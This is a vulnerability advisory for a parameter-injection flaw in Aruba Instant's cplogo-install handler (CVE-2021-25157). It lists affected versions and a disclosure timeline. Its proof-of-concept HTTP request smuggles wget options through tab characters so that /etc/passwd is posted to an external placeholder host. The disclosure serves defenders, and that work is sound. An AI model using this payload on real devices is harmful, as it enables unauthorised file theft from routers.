<--

Authenticated Arbitrary File Read via Web UI (cplogo-install)

Aleph Research Advisory

Identifier

Severity

Moderate

Product

  • Aruba Instant

Vulnerable Versions

    • Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
    • Aruba Instant 6.5.x: 6.5.4.18 and below
    • Aruba Instant 8.3.x: 8.3.0.14 and below
    • Aruba Instant 8.5.x: 8.5.0.11 and below
    • Aruba Instant 8.6.x: 8.6.0.6 and below
    • Aruba Instant 8.7.x: 8.7.1.0 and below

Technical Details

An authenticated attacker can read arbitrary files from the router and send them to a remote server. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.

POC:

POST /swarm.cgi HTTP/1.1
Host: IP:4343
.......
.......
Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin
 
opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"http://EXTERNAL-IP/backup.cfg%09--post-file%09/etc/passwd%09#"'&refresh=false&sid=XXXXXXXXXXXXXXXXXXXX&nocache=0.23759201691110987&=&=

Timeline

  • 09-Mar-21
    : Public disclosure.
  • 09-Mar-21
    : Patch available.
  • 03-Feb-21
    : CVE-2021-25157 assigned.
  • 22-Nov-20
    : Reported.

Posts

Credit

External References